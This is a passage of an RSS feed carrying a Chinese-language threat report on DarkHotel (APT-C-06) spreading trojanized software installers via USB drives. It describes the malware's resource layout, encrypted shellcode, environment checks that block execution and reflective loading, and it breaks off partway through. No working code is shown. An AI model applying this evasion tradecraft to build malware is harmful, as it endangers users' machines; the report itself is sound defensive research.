mpa-font-style="ml0ep2m5m97"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;color: rgba(0, 0, 0, 0.9);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;text-indent: 2em;font-size: 14px;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;" data-pm-slice="0 0 []"><span leaf="">点击下方“</span></span><span style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;text-indent: 2em;font-size: 14px;background-color: rgb(255, 255, 255);color: rgb(0, 122, 170);box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);">阅读原文</span></span></span><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;color: rgba(0, 0, 0, 0.9);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;text-indent: 2em;font-size: 14px;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">”查看完整版报告</span></span></span></p><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div data-tools="135编辑器" data-id="94375" data-width="28%" style="width: 28%;flex: 0 0 28%;margin-left: 0px;margin-right: auto;box-sizing:border-box;max-width:28% !important;"><div style="text-align: center;"><p style="width:3.6em;display: inline-block;box-sizing:border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.8895027624309392" data-w="181" style="width: 3.6em;display: block;vertical-align:baseline;box-sizing:border-box;" src="https://wechat2rss.xlab.app/img-proxy/?k=db13a051&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F7QRTvkK2qC5GUbQCMws4DwCrakx3FiaDA57CMxiaWcSZKIa65Obg7ePmLUNOn0PHQnicRBmGFJIzxSFu0f9iaicFL0Q%2F640%3Fwx_fmt%3Dgif"/></p></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://pub1-bjyt.s3.360.cn/bcms/2025%E5%B9%B4%E5%BA%A6%E5%85%A8%E7%90%83APT%E5%A8%81%E8%83%81%E7%A0%94%E7%A9%B6%E6%8A%A5%E5%91%8A.pdf">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=8c3ff80e&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247507800%26idx%3D1%26sn%3D45494ff2fd1abf277f95315267dc91a9">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 30 Jan 2026 13:07:00 +0800</pubDate>
    </item>
    <item>
      <title>APT-C-06（DarkHotel）利用U盘内安装程序传播恶意载荷的攻击活动报告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507786&amp;idx=1&amp;sn=b66895d9e7266b8b68e975fea5b15f96</link>
      <description>继APT-C-06（DarkHotel）在2025年6月份使用恶意软件展开一波攻击活动[1]后， 我们又在2025年下半年监测观察到另一波相似的攻击活动。</description>
      <content:encoded><![CDATA[<p>原创 <span>高级威胁研究院</span> <span>2026-01-14 17:30</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=af93d641&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6CNEHNicic4Prfk1r9k2JPVmq5MCibbqt4qqX0fNwjgJmEIWibkD7ByibRHeQIz9ntKYqousSM9Umfxepyh6ocXCg6w%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>继APT-C-06（DarkHotel）在2025年6月份使用恶意软件展开一波攻击活动[1]后， 我们又在2025年下半年监测观察到另一波相似的攻击活动。</p>
  <div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="102539"><div style="margin: 10px auto;text-align: left;"><div style="background: #f2f2f2;"><div style="padding: 1em;" data-pm-slice="7 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-tools&#34;:&#34;135编辑器&#34;,&#34;data-id&#34;:&#34;102539&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin: 10px auto;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background: #f2f2f2;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="display: flex;justify-content:  space-between;align-items: flex-end;" hm_fix="312:231"><div style="display: flex;justify-content: space-between;flex-direction: column;align-items: flex-start;border-left: 4px solid rgb(190, 25, 31);"><p data-brushtype="text" style="font-size: 16px;letter-spacing: 1.5px;padding-right: 0em;padding-bottom: 3px;padding-left: 0em;color: rgb(50, 40, 40);margin-left: 12px;border-bottom: 1px solid rgb(190, 25, 31);font-style: italic;"><span style="font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">APT-C-06</span></strong></span></p><p data-brushtype="text" style="letter-spacing: 1.5px;padding-top: 4px;padding-right: 0em;padding-left: 0em;color: rgb(190, 25, 31);font-style: italic;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 18px;"><strong><span leaf="">DarkHotel</span></strong></span></span></p></div></div><div data-autoskip="1" style="text-align: justify;line-height:1.75em;letter-spacing: 1.5px;font-size:14px;color:#000;margin-top: 20px;"><p style="text-align: justify;vertical-align: inherit;color: rgb(51, 51, 51);text-indent: 28px;font-family: 等线;margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);"><span leaf="">继APT-C-06（DarkHotel）在2025年6月份使用恶意软件展开一波攻击活动[1]后， 我们又在2025年下半年监测观察到另一波相似的攻击活动。在这次攻击活动中，更多类型的恶意软件出现，这些软件通过U盘接入，没有像之前一样部署DarkSeal载荷，而是部署在2025年初攻击活动[2]中使用的载荷。</span></span></span></p></div></div></div></div></div></div></div><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 一、攻击流程 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">从技战术上看，这次攻击活动是2025年上半年前两次攻击的组合，伪装成正常软件的exe文件通过资源释放包含drivermon.ps1的loader。在此次攻击活动中，恶意安装包都是用可移动磁盘的方式接入用户机器的，可疑的是没有观察到drivermon.ps1的下一阶段载荷。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024111" data-ratio="0.42427745664739885" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=8877fa98&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYqdo8yJN7L8PV2ib6ZSFnbic7g74icG6UYdVZfkqW9th7UYs0G1icAP9g6w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="text-align: left;vertical-align: inherit;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-wrap: wrap;background-color: rgb(190, 25, 31);font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="letter-spacing: 0.578px;text-wrap: wrap;background-color: rgb(190, 25, 31);font-size: 18px;line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-align: left;vertical-align: inherit;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;background-color: rgb(190, 25, 31);font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;background-color: rgb(190, 25, 31);font-size: 18px;line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 二、载荷分析 </span></span></strong></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">1. 恶意安装包</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">伪装的恶意软件主要是一些工具软件，如TrueCrypt Setup 7.1a.exe，Install SanDisk Software.exe，winrar-x64英文.exe，winrar_5.40.exe，AdobeReader8.10.exe，FlashFXP54_3970_Setup.exe，SpyDetectFree64.exe等。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">这些恶意软件的资源通常都是下图的结构。“RC Data”类型的资源有两个，一个为BIN_00，修改前两个字节后即为原始的安装程序，另一个为BIN_06(或者BIN_03)解密后为shellcode形式的恶意载荷。软件的核心功能就是执行正常的安装程序，并加载Shellcode。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024112" data-ratio="0.41271676300578036" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=d60ea062&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYDXf3W1sMMR62GsQ3ahyy0lpqxLyx1ic126FQnXn5F5FJOerNNjIz78g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">释放并执行原始的安装程序时，释放的路径为在原始路径基础上在文件名前加一个下划线，并将文件设置系统隐藏属性。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024113" data-ratio="0.41271676300578036" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=14f04fdc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYy71C9IP8KsCs8JpvuEMrvNBwz5JmxeBib41G0kjPoPibJM6PazHaibILw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">如果存在Global\TermSvrReadyMutex锁或者C:/ProgramData/Windows/IdentityCRL/Cert路径则不会加载Shellcode。通过在互联网搜索相关信息，Global\TermSvrReadyMutex锁可能对应远程桌面服务开启；C:/ProgramData/Windows/IdentityCRL/Cert可能对应设备注册到Azure AD。总体来说共攻击者可能不希望载荷在一些相对“</span><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">专业</span></span><span leaf="">”的电脑上运行。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024114" data-ratio="0.11098265895953757" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=8f35bd79&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYAicryW0VdLyrWf0mib6HZNuzWzClrqcK8pnicKFgpUof3Ypsnsn0m8ERA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><strong style="color: rgb(190, 25, 31);font-size: 17px;letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">2. 载荷分析</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Shellcode的结构和Darkseal组件类似。Shellcode Loader用于反射加载第二部分的pe载荷。</span></span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024115" data-ratio="0.9970588235294118" data-s="300,640" type="block" data-type="png" data-w="340" src="https://wechat2rss.xlab.app/img-proxy/?k=d68065b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYxtxdzk4t3XIzQnkFO5Bz43ORT1lh2cuZ1jJ1OfVy9z41LDJkibN6q5g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">PE载荷与年初攻击活动中使用的载荷k1nqa.dll基本一致。首先会检查杀软安装情况。不同杀软安装情况会对后续流程产生一些影响。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024116" data-ratio="0.6313065976714101" data-w="773" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=9f8ba0c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYCM5YicDnuiaK7lja8RfAqcedvXPZBrU2wtica8JQ24R4LNgVS9ia7SdiaJw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span 